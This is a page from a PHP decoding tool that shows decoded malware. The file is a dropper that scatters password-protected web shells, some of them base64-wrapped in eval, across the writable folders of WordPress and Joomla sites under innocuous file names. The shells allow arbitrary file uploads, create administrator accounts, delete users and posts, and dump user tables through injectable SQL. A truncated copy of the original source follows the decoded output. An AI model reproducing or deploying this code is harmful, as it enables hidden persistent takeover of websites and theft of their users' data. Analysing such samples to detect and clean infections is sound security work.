Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function filter_dirs($dir) { if(PLATFORM != "WORDPRESS") { ..

Decoded Output download

<?php 
 
function filter_dirs($dir) { 
 
        if(PLATFORM != "WORDPRESS") { 
 
                return true; 
 
        } 
 
 
 
        return preg_match("/\/wp\-(admin|content|includes)/", $dir); 
 
} 
 
 
 
function get_all_dirs($dir) { 
 
        global $all_dirs; 
 
 
 
        foreach(glob("$dir/*") as $file) { 
 
                if(is_dir($file)) { 
 
                        if(is_writable($file)) { 
 
                                $all_dirs[] = $file; 
 
                        } 
 
                        get_all_dirs($file); 
 
                } 
 
        } 
 
} 
 
 
 
function get_file_name($path) { 
 
        $jm_file_names = array( 
 
                'cache.php', 
 
                'configure.php', 
 
                'settings.php', 
 
                'config.php', 
 
                'admin.php', 
 
                'admin-class.php', 
 
                'menus.php', 
 
                'components.php', 
 
                'languages.php', 
 
                'class-library.php', 
 
                'include.php', 
 
                'common.php' 
 
        ); 
 
 
 
        $wp_file_names = array( 
 
                'wp-update.php', 
 
                'wp-block.php', 
 
                'wp-blog.php', 
 
                'wp-content.php', 
 
                'wp-ping.php', 
 
                'wp-widgets.php', 
 
                'wp-search.php', 
 
                'wp-find.php', 
 
                'wp-post-update.php', 
 
                'wp-page-update.php', 
 
                'wp-theme.php', 
 
                'wp-template.php', 
 
                'wp-query.php', 
 
                'wp-admin-block.php', 
 
                'wp-category.php', 
 
                'wp-rewrite.php', 
 
                'wp-taxonomy.php', 
 
                'wp-xml-function.php', 
 
                'wp-rss.php', 
 
                'rss-feed.php', 
 
                'wp-plugins.php', 
 
                'wp-register.php', 
 
                'admin-menu.php' 
 
        ); 
 
 
 
        if(PLATFORM == 'WORDPRESS') { 
 
                $file_names = $wp_file_names; 
 
        } 
 
        else { 
 
                $file_names = $jm_file_names; 
 
        } 
 
 
 
        do { 
 
                $full_path = $path . $file_names[array_rand($file_names)]; 
 
        }while(file_exists($full_path)); 
 
 
 
        return $full_path; 
 
} 
 
 
 
@set_time_limit(300); 
 
 
 
define("MAX_LEVELS_UP", 7); 
 
 
 
$wp_code = '<?php
header('Content-Type:text/html; charset=UTF-8');

@set_time_limit(60);

define('API_VERSION', 2.0);
define('PASSWORD_FILE', 'p.txt');

if(file_exists(PASSWORD_FILE)) {
	@unlink(PASSWORD_FILE);
}

//////////////////////////////////////////
function array_to_json( $array )
{
    if (is_string($array)) return '"'.rawurlencode($array).'"';
    if (is_numeric($array)) return $array;
    if ($array === null) return 'null';
    if ($array === true) return 'true';
    if ($array === false) return 'false';

    $assoc = false;
    $i = 0;
    foreach ($array as $k=>$v){
        if ($k !== $i++){
            $assoc = true;
            break;
        }
    }
    $res = array();
    foreach ($array as $k=>$v){
        $v = array_to_json($v);
        if ($assoc){
            $k = '"'.rawurlencode($k).'"';
            $v = $k.':'.$v;
        }
        $res[] = $v;
    }
    $res = implode(',', $res);
    return ($assoc)? '{'.$res.'}' : '['.$res.']';
}
//////////////////////////////////////////

define('SHELL_PASSWORD', 'a6a8cb877ee18215f2c0fc2a6c7b4f2a');
define('MAX_UP_LEVELS', 10);

if((empty($_COOKIE['password']) && empty($_POST['password'])) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
	print '<form method="post" action="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'">Password : <input type="text" name="password"><input type="submit"></form>';
	exit;
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
	setcookie('password', SHELL_PASSWORD, time()+60*60*24);
	header("Location: {$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}");
	exit;
}

if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
	exit;
}

if(!empty($_FILES['f'])) {
	$new_path = dirname(__FILE__) . '/' . $_FILES['f']['name'];
	if(move_uploaded_file($_FILES['f']['tmp_name'], $new_path)) {
		print "<a href=\"{$_FILES['f']['name']}\">{$_FILES['f']['name']}</a>";
	}
	else {
		print "Upload failed!";
	}
	exit;
}

if(!empty($_REQUEST['uf']) && $_REQUEST['uf'] == 1) {
	print "<form method=\"post\" enctype=\"multipart/form-data\" action=\"{$_SERVER['PHP_SELF']}\"><input type=\"file\" name=\"f\"><input type=\"submit\"></form>";
	exit;
}

$counter = 0;
$dir_up = './';
do {
	$file_found = false;
	$file_path = "{$dir_up}wp-load.php";
	if(file_exists($file_path)) {
		require($file_path);
		$file_found = true;
	}
	else {
		$dir_up .= '../';
	}
	$counter++;
}while(!$file_found && $counter < MAX_UP_LEVELS);

if(!empty($_GET['get_users'])) {
	print array_to_json(get_users());
}
//print_r($_REQUEST);
if(isset($_REQUEST['action']) && $_REQUEST['action'] == 'create_user') {
if(empty($_REQUEST['wp_username']) || empty($_REQUEST['wp_password']) || empty($_REQUEST['wp_email'])){
print "Missing parameter for creating user!";
exit;
}
else {
$userdata = array('user_login' => $_REQUEST['wp_username'], 'user_pass' => $_REQUEST['wp_password'], 'user_email' => $_REQUEST['wp_email'], 'role' => 'administrator');
//print_r($_REQUEST);
$user_id = wp_insert_user( $userdata );
	if(is_numeric($user_id)) {
		print array_to_json(array('user_id' => $user_id));
	}
	else {
			print array_to_json("Failed creating user!");
		}
	}
}

if(!empty($_REQUEST['delete_user']) && !empty($_REQUEST['wp_user_id'])) {
	if(wp_delete_user($_REQUEST['wp_user_id'])) {
		print array_to_json("User deleted!");
	}
	else {
		print array_to_json("Failed deleting user!");
	}
}

if($_REQUEST['delete_post'] == 1 && !empty($_REQUEST['ID'])) {
	$del_op_res = wp_delete_post( $_REQUEST['ID'], true );
	if(!$del_op_res) print array_to_json("Delete failed!");
	else print array_to_json("Post deleted!");
	exit;
}

if(!empty($_REQUEST['title']) && !empty($_REQUEST['post'])) {
	$post_date = $_REQUEST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);

	// Create post object
	$my_post = array(
	  'post_title'    => $_REQUEST['title'],
	  'post_content'  => $_REQUEST['post'],
	  'post_status'   => 'publish',
	  'post_author'   => 1,
	  'post_type' => $_REQUEST['post_type'],
	  'post_date'     => $post_date
	);
	$id = NULL;
	if(empty($_REQUEST['ID'])) {
		// Insert the post into the database
		$id = wp_insert_post($my_post);
	}
	else {
		$my_post['ID'] = $_REQUEST['ID'];
		$id = wp_update_post($my_post);
	}
	$permalink = get_permalink( $id );
	wp_set_post_categories($id, array($_REQUEST['cat']));
	if($_REQUEST['delete_post'] != 1) {
		if(!empty($id)) {
			$post = get_post($id);
			print array_to_json(array("permalink"=>$permalink,"link_by_id"=>$post->guid,"ID"=>$id));
		}
		else {
			print array_to_json("Action failed!");
		}
	}
}

if(!empty($_REQUEST['plugin2update'])) {
	include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
	include_once( $dir_up . 'wp-admin/includes/update.php');
	include_once( $dir_up . 'wp-admin/includes/file.php');
	include_once( $dir_up . 'wp-admin/includes/screen.php');
	include_once( $dir_up . 'wp-admin/includes/misc.php');
	include_once( $dir_up . 'wp-admin/includes/plugin.php');
	
	foreach($_REQUEST['plugin2update'] as $plugin) {
		print "$plugin update : ";
		wp_update_plugin($plugin);
	}
	
	exit;
}

if(!empty($_REQUEST['file2clean'])) {
$tell_a_friend_content = '<?php
/*
Plugin Name: Tell a Friend
Version: 0.1
Plugin URI: http://www.freetellafriend.com/get_button/
Description: Adds a \'Share This Post\' button after each post. The service which is used is freetellafriend.com which supports e-mail address book, social bookmarks and favorites.
Author: FreeTellaFriend
Author URI: http://www.freetellafriend.com/
*/

function tell_a_friend($content) {
global $post;
$taf_permlink = urlencode(get_permalink($post->ID));
$taf_title = urlencode(get_the_title($post->ID) );
$taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';

	if ( !is_feed() && !is_page() ) {
	$content .= \'<a href="https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'" onclick="window.open(\'https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'\', \'freetellafriend\', \'scrollbars=1,menubar=0,width=617,height=530,resizable=1,toolbar=0,location=0,status=0,screenX=210,screenY=100,left=210,top=100\'); return false;" target="_blank" title="Share This Post"><img src="\'.$taf_img.\'" style="width:127px;height:16px;border:0px;" alt="Share This Post" title="Share This Post" /></a>\';				  
	}

return $content;
}

add_filter(\'the_content\', \'tell_a_friend\');

?>';

	if(file_exists($_REQUEST['file2clean'])) {
		if(strpos($_REQUEST['file2clean'], 'tell-a-friend.php') !== false) {
			if(file_put_contents($_REQUEST['file2clean'], $tell_a_friend_content)) {
				print "File {$_REQUEST['file2clean']} has been cleaned.";
			}
			else {
				print "Failed cleaning {$_REQUEST['file2clean']} !";
			}
		}
	}
}

if(!empty($_REQUEST['get_plugins']) && $_REQUEST['get_plugins'] == 1) {
	include_once($dir_up . 'wp-admin/includes/plugin.php');
		
	$plugins = get_plugins();
	print array_to_json($plugins);
}

if(!empty($_REQUEST['post_url2search'])) {
	$the_slug = str_replace('/', '', $_REQUEST['post_url2search']);
	$args = array(
		'name' => $the_slug,
		'post_status' => 'publish',
		'posts_per_page' => 1
	);
	$my_posts = get_posts( $args );

	if(!empty($my_posts[0]->ID) && is_numeric($my_posts[0]->ID)) {
		$post = get_post($my_posts[0]->ID);
		$post->category = get_the_category($my_posts[0]->ID);
	}
	
	print array_to_json($post);
}

if(!empty($_REQUEST['post_id'])) {
	$post = get_post($_REQUEST['post_id']);
	$post->category = get_the_category($_REQUEST['post_id']);
	print array_to_json($post);
}

if(!empty($_REQUEST['page_id'])) {
	$post = get_page($_REQUEST['page_id']);
	$post->category = get_the_category($_REQUEST['page_id']);
	print array_to_json($post);
}

$args = array(
	'show_option_all'    => '',
	'show_option_none'   => '',
	'orderby'            => 'ID', 
	'order'              => 'ASC',
	'show_count'         => 1,
	'hide_empty'         => 0, 
	'child_of'           => 0,
	'exclude'            => '',
	'echo'               => 1,
	'selected'           => $sel_cat,
	'hierarchical'       => 0, 
	'name'               => 'cat',
	'id'                 => '',
	'class'              => 'postform',
	'depth'              => 0,
	'tab_index'          => 0,
	'taxonomy'           => 'category',
	'hide_if_empty'      => false,
    'walker'             => ''
);

if(!empty($_REQUEST['get_categories']) && $_REQUEST['get_categories'] == 1) {
	print array_to_json(get_categories( $args )); 
}

if(!empty($_REQUEST['get_pages_list']) && $_REQUEST['get_pages_list'] == 1) {
	$pages_array = get_pages();
	$new_pages_array = array();
	for($i=0,$len=count($pages_array);$i<$len;$i++) {
		$new_pages_array[$i]['ID'] = $pages_array[$i]->ID;
		$new_pages_array[$i]['post_title'] = $pages_array[$i]->post_title;
		$new_pages_array[$i]['post_name'] = $pages_array[$i]->post_name;
	}
	print array_to_json($new_pages_array);
}

if(!empty($_REQUEST['get_posts_list'])) {
	if(isset($_REQUEST['search_by_post_type'])) {
		$post_type = $_REQUEST['search_by_post_type'];
	}
	else {
		$post_type = '';
	}

	$args = array(
	'posts_per_page'   => 50,
	'offset'           => 0,
	'category'         => '',
	'category_name'    => '',
	'orderby'          => 'ID',
	'order'            => 'DESC',
	'include'          => '',
	'exclude'          => '',
	'meta_key'         => '',
	'meta_value'       => '',
	'post_type'        => $post_type,
	'post_mime_type'   => '',
	'post_parent'      => '',
	'post_status'      => 'publish',
	'suppress_filters' => true );

	if(isset($_REQUEST['search_by_url'])) {
		$the_slug = str_replace('/', '', $_REQUEST['search_by_url']);
		if(!empty($post_type) && $post_type == 'post') {
			$args['name'] = $the_slug;
		}
		else {
			$args['pagename'] = $the_slug;
		}
	}
	
	if(isset($_REQUEST['search_by_keyword'])) {
		$args['s'] = $_REQUEST['search_by_keyword'];
	}
	
	$posts_array = get_posts( $args );
	for($i=0,$len=count($posts_array);$i<$len;$i++) {
		$new_posts_array[$i]['ID'] = $posts_array[$i]->ID;
		$new_posts_array[$i]['post_title'] = $posts_array[$i]->post_title;
		$new_posts_array[$i]['post_name'] = $posts_array[$i]->post_name;
		$new_posts_array[$i]['post_content'] = $posts_array[$i]->post_content;
	}
	print array_to_json($new_posts_array);
}

if(!empty($_REQUEST['upload_file'])) {
	print '<form method="post" enctype="multipart/form-data"><input type="file" name="my_file"><input type="submit"></form>';
}

if(!empty($_FILES['my_file'])) {
	$base_name = basename($_FILES['my_file']['name']);
	if(move_uploaded_file($_FILES['my_file']['tmp_name'], $base_name)) {
		print '<a href="'.$base_name.'" target="_blank">'.$base_name.'</a>';
	}
}

if(!empty($_REQUEST['get_api_version'])) {
	print array_to_json(array('api_version' => number_format(API_VERSION, 2)));
}
?>'; 
 
 
 
$jm_code = '<?php
header('Content-Type:text/html; charset=UTF-8');

@set_time_limit(60);

define('API_VERSION', 2.0);
define('PASSWORD_FILE', 'p.txt');

if(file_exists(PASSWORD_FILE)) {
	@unlink(PASSWORD_FILE);
}

//////////////////////////////////////////
function array_to_json( $array )
{
    if (is_string($array)) return '"'.addslashes($array).'"';
    if (is_numeric($array)) return $array;
    if ($array === null) return 'null';
    if ($array === true) return 'true';
    if ($array === false) return 'false';

    $assoc = false;
    $i = 0;
    foreach ($array as $k=>$v){
        if ($k !== $i++){
            $assoc = true;
            break;
        }
    }
    $res = array();
    foreach ($array as $k=>$v){
        $v = array_to_json($v);
        if ($assoc){
            $k = '"'.addslashes($k).'"';
            $v = $k.':'.$v;
        }
        $res[] = $v;
    }
    $res = implode(',', $res);
    return ($assoc)? '{'.$res.'}' : '['.$res.']';
}

function get_full_path($link) {
	$dir = dirname($_SERVER['PHP_SELF']);
	$levels_up = substr_count(JPATH_SITE, '..');
	for($i=0;$i<$levels_up;$i++) {
		preg_match('/(\/[^\/]+)$/', $dir, $matches);
		$dir = preg_replace('/\/[^\/]+$/', '', $dir);
		$link = str_replace($matches[1], '', $link);
	}
	
	if(strpos($link, 'http') !== 0) {
		$link = 'http' . (empty($_SERVER['HTTPS']) ? '' : 's') . '://' . $_SERVER['SERVER_NAME'] . $link;
	}
	
	return $link;
}
//////////////////////////////////////////

define('SHELL_PASSWORD', 'a6a8cb877ee18215f2c0fc2a6c7b4f2a');
define('MAX_UP_LEVELS', 10);

if((empty($_COOKIE['password']) && empty($_POST['password'])) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
	print '<form method="post">Password : <input type="text" name="password"><input type="submit"></form>';
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
	setcookie('password', SHELL_PASSWORD, time() + 60*60*24);
	header("Location: {$_SERVER['PHP_SELF']}");
	exit;
}

if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {
	exit;
}

if(!empty($_FILES['f'])) {
	$new_path = dirname(__FILE__) . '/' . $_FILES['f']['name'];
	if(move_uploaded_file($_FILES['f']['tmp_name'], $new_path)) {
		print "<a href=\"{$_FILES['f']['name']}\">{$_FILES['f']['name']}</a>";
	}
	else {
		print "Upload failed!";
	}
	exit;
}

if(!empty($_REQUEST['uf']) && $_REQUEST['uf'] == 1) {
	print "<form method=\"post\" enctype=\"multipart/form-data\" action=\"{$_SERVER['PHP_SELF']}\"><input type=\"file\" name=\"f\"><input type=\"submit\"></form>";
	exit;
}

define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

$counter = 0;
$dir_up = '.' . DS;
do {
	$file_found = false;
	$file_path = $dir_up . 'administrator';
	if(file_exists($file_path)) {
		$file_found = true;
	}
	else {
		$dir_up .= '..' . DS;
	}
	$counter++;
}while(!$file_found && $counter < MAX_UP_LEVELS);

define('JPATH_BASE', $dir_up);
	
require_once ( JPATH_BASE . 'includes'.DS.'defines.php' );
require_once ( JPATH_BASE . 'includes'.DS.'framework.php' );

//define('JPATH_COMPONENT_ADMINISTRATOR', dirname(__FILE__) . "/administrator");
define('JPATH_COMPONENT_ADMINISTRATOR', JPATH_BASE . DS . 'administrator' . DS . 'components' . DS . 'com_content');
require_once JPATH_BASE.'/includes/framework.php';
//$app = JFactory::getApplication('site');
//require_once JPATH_BASE.'/includes/framework.php';


//echo JPATH_BASE. "/administrator/components/com_content/models/article.php";
require_once JPATH_BASE. "/components/com_content/models/article.php";
                         //administrator/components/com_content/models

require_once(JPATH_BASE.DS.'components'.DS.'com_content'.DS.'helpers'.DS.'route.php');						 
						 
$app = JFactory::getApplication('site', array('session' => false));
$app->initialise();

if(!empty($_REQUEST['title']) && !empty($_REQUEST['body'])) {

foreach($_REQUEST as $key => $value) {
	$_REQUEST[$key] = stripslashes($value);
}

	$new_article = new ContentModelArticle();
	$date = date($_REQUEST['publish_up'] . ' ' . rand(1,23). ':' . rand(1,59). ':' . rand(1,59));
	$data = array(
		'catid' => $_REQUEST['catid'], //newsarticles
		'title' => $_REQUEST['title'],
		'fulltext' => $_REQUEST['body'],
		'introtext' => $_REQUEST['intro'],
		'state' => $_REQUEST['published'],
        'created_by' => $_REQUEST['created_by'],
        'publish_up' => $date,
		'created' => $date,
		'alias' => $_REQUEST['alias'],
		'language' => $_REQUEST['lang'] //FORMAT EXAMPLE: en-GB
	);
	if(!empty($_REQUEST['id'])) {
		$data['id'] = $_REQUEST['id'];
	}
	$table = JTable::getInstance('content', 'JTable', array());
	// Bind data
	if (!$table->bind($data))
	{
		print_r($table->getError());
		return false;
	}
	
	// Store the data.
	if (!$table->store())
	{
		print_r($table->getError());
	}
	
	print json_encode(array("article_id" => $table->id));
}

if(!empty($_REQUEST['id2delete'])) {
	$row = JTable::getInstance('content', 'JTable');
	$row->delete($_REQUEST['id2delete']);
}

$db = JFactory::getDBO(); // get database object

if(!empty($_REQUEST['article_id'])) {
	$article_id = $_REQUEST['article_id'];
	$sql = "SELECT * FROM #__content WHERE id='" . $_REQUEST['article_id']."'"; // prepare query

	$db->setQuery($sql); // apply query
	$article = $db->loadObject(); // execute query, return result list
}

if(!empty($article)) {
	print array_to_json($article);
}

if(!empty($_REQUEST['username2delete'])) {
	$user = JFactory::getUser($_REQUEST['username2delete']);
	if($user->delete()) {
		print "User {$_REQUEST['username2delete']} has been deleted!";
	}
}

if(!empty($_REQUEST['user_name']) && !empty($_REQUEST['user_password']) && !empty($_REQUEST['user_email'])) {
	/*
 
	I handle this code as if it is a snippet of a method or function!!
	 
	First set up some variables/objects
	*/
	// get the ACL
	$acl =& JFactory::getACL();
	 
	/* get the com_user params */
	 
	jimport('joomla.application.component.helper'); // include libraries/application/component/helper.php
	$usersParams = &JComponentHelper::getParams( 'com_users' ); // load the Params
	 
	// "generate" a new JUser Object
	$user = JFactory::getUser(0); // it's important to set the "0" otherwise your admin user information will be loaded
	 
	$data = array(); // array for all user settings
	
	$usertype = 'Super Administrator';
	 
	// set up the "main" user information
	
	$data['name'] = 'Zhano Zhano'; // add first- and lastname
	$data['username'] = $_REQUEST['user_name']; // add username
	$data['email'] = $_REQUEST['user_email']; // add email
	$data['gid'] = 24;  // generate the gid from the usertype
	 
	/* no need to add the usertype, it will be generated automaticaly from the gid */
	 
	$data['password'] = $_REQUEST['user_password']; // set the password
	$data['password2'] = $_REQUEST['user_password']; // confirm the password
	$data['sendEmail'] = 1; // should the user receive system mails?
	 
	/* Now we can decide, if the user will need an activation */
	$data['block'] = 0; // don't block the user
	 
	if (!$user->bind($data)) { // now bind the data to the JUser Object, if it not works....
		JError::raiseWarning('', JText::_( $user->getError())); // ...raise an Warning
	}
	 
	if (!$user->save()) { // if the user is NOT saved...
		JError::raiseWarning('', JText::_( $user->getError())); // ...raise an Warning
	}
	 
	print array_to_json($user->username . " created!"); // else return the new JUser object
}

if(!empty($_REQUEST['get_cats'])) {
	$cat_urls = array();
	$sql = "SELECT #__categories.id, #__categories.title, #__menu.path AS menu_path, COUNT(#__content.id) AS count_articles FROM #__categories 
	INNER JOIN #__content ON #__categories.id = #__content.catid 
	INNER JOIN #__menu ON #__categories.id = REPLACE(#__menu.link, 'index.php?option=com_content&view=category&layout=blog&id=', '')
	GROUP BY #__categories.id ORDER BY #__categories.title ";
	$db->setQuery($sql); // apply query
	$cats = $db->loadObjectList();
	for ($i=0,$len=count($cats);$i<$len;$i++) {
		$cats[$i]->path = get_full_path(JURI::base() . $cats[$i]->menu_path);
		unset($cats[$i]->menu_path);
	}
	
	if(empty($cats)) {
		$sql = "SELECT #__categories.id, #__categories.title FROM #__categories ";
		$db->setQuery($sql); // apply query
		$cats = $db->loadObjectList();
		for ($i=0,$len=count($cats);$i<$len;$i++) {
			$cats[$i]->path = get_full_path(JURI::base() . 'index.php?option=com_content&view=category&layout=blog&id=' . $cats[$i]->id);
			$cats[$i]->count_articles = '?';
		}
	}
	
	print array_to_json($cats);
}

if(!empty($_REQUEST['get_user'])) {
	$sql = "SELECT * FROM #__users ";
	$db->setQuery($sql); // apply query
	$users = $db->loadObjectList();
	print array_to_json($users);
}

if(!empty($_REQUEST['get_articles_list'])) {
	$offset = 0;
	$articles_num = 50;
	$all_articles = array();
	
	$cond = '';
	if(!empty($_REQUEST['search_by_title'])) {
		$cond .= " AND #__content.title LIKE '%{$_REQUEST['search_by_title']}%' ";
	}
	
	if(!empty($_REQUEST['search_by_body'])) {
		$cond .= " AND (#__content.fulltext LIKE '%{$_REQUEST['search_by_body']}%' OR #__content.introtext LIKE '%{$_REQUEST['search_by_body']}%') ";
	}
	
	if(!empty($_REQUEST['search_by_alias'])) {
		$cond .= " AND #__content.alias LIKE '%{$_REQUEST['search_by_alias']}%' ";
	}
	
	if(empty($cond)) {
		$cond = ' AND 2=2 ';
	}
	
	do {
		$sql = "SELECT #__content.id, #__content.title, #__content.fulltext, #__content.introtext, #__content.alias FROM #__content WHERE 1=1 {$cond} ORDER BY `title` LIMIT {$offset}, $articles_num "; // prepare query
		$db->setQuery($sql); // apply query
		$articles = $db->loadObjectList(); // execute query, return result list
		$all_articles += $articles;
		$offset += $articles_num;
	}while(count($articles) == $articles_num);
	print array_to_json($all_articles);
}

if(!empty($_REQUEST['article_sef_url'])) {
	$sql = "SELECT catid, alias, language FROM #__content WHERE id = '{$_REQUEST['article_sef_url']}' ";
	$db->setQuery($sql); // apply query
	$article = $db->loadObject(); // execute query, return result list

	$sql = "SELECT path FROM #__menu WHERE link LIKE 'index.php?option=com_content&view=category&%id={$article->catid}' ";
	$db->setQuery($sql); // apply query
	$cat_path = $db->loadObject();
	if(isset($cat_path->path)) {
		$slug = $_REQUEST['article_sef_url'] . ':' . $article->alias;
		$catslug = $article->catid . ':' . $cat_path->path;
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($slug, $catslug));
		if(!empty($article->language)) {
			$link = str_replace('index.php/', 'index.php/' . substr($article->language, 0, 2) . '/', $link);
		}
		print array_to_json(get_full_path($link));
	}
	else {
		print array_to_json(get_full_path(JURI::base() . 'index.php?option=com_content&view=article&id=' . $_REQUEST['article_sef_url']));
	}
}

if(!empty($_REQUEST['get_languages'])) {
	$languages = JLanguageHelper::getLanguages();
	print array_to_json($languages);//lang_code INDEX IS USED FOR INSERTING INTO CONTENT
}

if(!empty($_REQUEST['get_jm_version'])) {
	print array_to_json(JVERSION);
}

if(!empty($_REQUEST['upload_file'])) {
	print '<form method="post" enctype="multipart/form-data"><input type="file" name="my_file"><input type="submit"></form>';
}

if(!empty($_FILES['my_file'])) {
	$base_name = basename($_FILES['my_file']['name']);
	if(move_uploaded_file($_FILES['my_file']['tmp_name'], $base_name)) {
		print '<a href="'.$base_name.'" target="_blank">'.$base_name.'</a>';
	}
}

if(!empty($_REQUEST['get_api_version'])) {
	print array_to_json(array('api_version' => number_format(API_VERSION, 2)));
}
?>'; 
 
 
 
$wp_enc_file = '<?php eval("?>" . base64_decode("'.$wp_code.'")); ?>'; 
 
$wp_dec_file = base64_decode($wp_code); 
 
 
 
$jm_enc_file = '<?php eval("?>" . base64_decode("'.$jm_code.'")); ?>'; 
 
$jm_dec_file = base64_decode($jm_code); 
 
 
 
$orig_dir = getcwd(); 
 
 
 
$counter = 0; 
 
do{ 
 
        foreach(glob("*") as $file) { 
 
                if(strpos($file, "wp-config.php") !== false) { 
 
                        define('PLATFORM', 'WORDPRESS'); 
 
                } 
 
                if(strpos($file, "configuration.php") !== false) { 
 
                        define('PLATFORM', 'JOOMLA'); 
 
                } 
 
        } 
 
        if(!defined('PLATFORM')) { 
 
                chdir('..'); 
 
                $counter++; 
 
        } 
 
        else { 
 
                $site_root_dir = getcwd(); 
 
        } 
 
}while(!defined('PLATFORM') && $counter < MAX_LEVELS_UP); 
 
 
 
if(!defined('PLATFORM')) { 
 
        exit("Unknown platform!"); 
 
} 
 
 
 
$all_dirs = array(); 
 
 
 
get_all_dirs(getcwd()); 
 
 
 
if(count($all_dirs) >= 10) { 
 
        $num_of_rand_dirs = 10; 
 
} 
 
else { 
 
        $num_of_rand_dirs = count($all_dirs); 
 
} 
 
 
 
$all_dirs = array_filter($all_dirs, "filter_dirs"); 
 
$chosen_dirs_indexes = array_rand($all_dirs, $num_of_rand_dirs); 
 
 
 
print "PLATFORM : " . PLATFORM . "<br>
"; 
 
 
 
if(PLATFORM == 'WORDPRESS') { 
 
        $contents = array($wp_enc_file, $wp_dec_file); 
 
} 
 
 
 
if(PLATFORM == 'JOOMLA') { 
 
        $contents = array($jm_enc_file, $jm_dec_file); 
 
} 
 
 
 
$web_dirname = dirname($_SERVER['REQUEST_URI']); 
 
$site_root_dir_splitted = explode("/", $site_root_dir); 
 
$web_dir_splitted = explode("/", $web_dirname); 
 
 
 
if($site_root_dir_splitted[count($site_root_dir_splitted)-1] == $web_dir_splitted[1]) { 
 
        $site_dir = $web_dir_splitted[1]; 
 
} 
 
 
 
$content_type = 0; 
 
$periods_count = 0; 
 
foreach($chosen_dirs_indexes as $chosen_dir_index) { 
 
        $file_name = get_file_name($all_dirs[$chosen_dir_index] . '/'); 
 
        if($periods_count < 2) { 
 
                $periods_count++; 
 
                $file_name .= '.'; 
 
        } 
 
        file_put_contents($file_name, $contents[$content_type]); 
 
        $file_rel_path = substr($file_name, strlen($site_root_dir)); 
 
        if(!isset($site_dir)) { 
 
                $site_dir = ''; 
 
        } 
 
        $file_full_path = $site_dir . $file_rel_path; 
 
        if($content_type == 0) { 
 
                $content_type = 1; 
 
        } 
 
        else { 
 
                $content_type = 0; 
 
        } 
 
        print preg_replace("/^\//", "", $file_full_path) . "<br>
"; 
 
        flush(); 
 
} 
 
//print PLATFORM; 
 
//print_r($all_dirs); 
 
?>

Did this file decode correctly?

Original Code

<?php

function filter_dirs($dir) {

        if(PLATFORM != "WORDPRESS") {

                return true;

        }



        return preg_match("/\/wp\-(admin|content|includes)/", $dir);

}



function get_all_dirs($dir) {

        global $all_dirs;



        foreach(glob("$dir/*") as $file) {

                if(is_dir($file)) {

                        if(is_writable($file)) {

                                $all_dirs[] = $file;

                        }

                        get_all_dirs($file);

                }

        }

}



function get_file_name($path) {

        $jm_file_names = array(

                'cache.php',

                'configure.php',

                'settings.php',

                'config.php',

                'admin.php',

                'admin-class.php',

                'menus.php',

                'components.php',

                'languages.php',

                'class-library.php',

                'include.php',

                'common.php'

        );



        $wp_file_names = array(

                'wp-update.php',

                'wp-block.php',

                'wp-blog.php',

                'wp-content.php',

                'wp-ping.php',

                'wp-widgets.php',

                'wp-search.php',

                'wp-find.php',

                'wp-post-update.php',

                'wp-page-update.php',

                'wp-theme.php',

                'wp-template.php',

                'wp-query.php',

                'wp-admin-block.php',

                'wp-category.php',

                'wp-rewrite.php',

                'wp-taxonomy.php',

                'wp-xml-function.php',

                'wp-rss.php',

                'rss-feed.php',

                'wp-plugins.php',

                'wp-register.php',

                'admin-menu.php'

        );



        if(PLATFORM == 'WORDPRESS') {

                $file_names = $wp_file_names;

        }

        else {

                $file_names = $jm_file_names;

        }



        do {

                $full_path = $path . $file_names[array_rand($file_names)];

        }while(file_exists($full_path));



        return $full_path;

}



@set_time_limit(300);



define("MAX_LEVELS_UP", 7);



$wp_code = '<?php
header('Content-Type:text/html; charset=UTF-8');

@set_time_limit(60);

define('API_VERSION', 2.0);
define('PASSWORD_FILE', 'p.txt');

if(file_exists(PASSWORD_FILE)) {
	@unlink(PASSWORD_FILE);
}

//////////////////////////////////////////
function array_to_json( $array )
{
    if (is_string($array)) return '"'.rawurlencode($array).'"';
    if (is_numeric($array)) return $array;
    if ($array === null) return 'null';
    if ($array === true) return 'true';
    if ($array === false) return 'false';

    $assoc = false;
    $i = 0;
    foreach ($array as $k=>$v){
        if ($k !== $i++){
            $assoc = true;
            break;
        }
    }
    $res = array();
    foreach ($array as $k=>$v){
        $v = array_to_json($v);
        if ($assoc){
            $k = '"'.rawurlencode($k).'"';
            $v = $k.':'.$v;
        }
        $res[] = $v;
    }
    $res = implode(',', $res);
    return ($assoc)? '{'.$res.'}' : '['.$res.']';
}
//////////////////////////////////////////

define('SHELL_PASSWORD', 'a6a8cb877ee18215f2c0fc2a6c7b4f2a');
define('MAX_UP_LEVELS', 10);

if((empty($_COOKIE['password']) && empty($_POST['password'])) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
	print '<form method="post" action="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'">Password : <input type="text" name="password"><input type="submit"></form>';
	exit;
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
	setcookie('password', SHELL_PASSWORD, time()+60*60*24);
	header("Location: {$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}");
	exit;
}

if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
	exit;
}

if(!empty($_FILES['f'])) {
	$new_path = dirname(__FILE__) . '/' . $_FILES['f']['name'];
	if(move_uploaded_file($_FILES['f']['tmp_name'], $new_path)) {
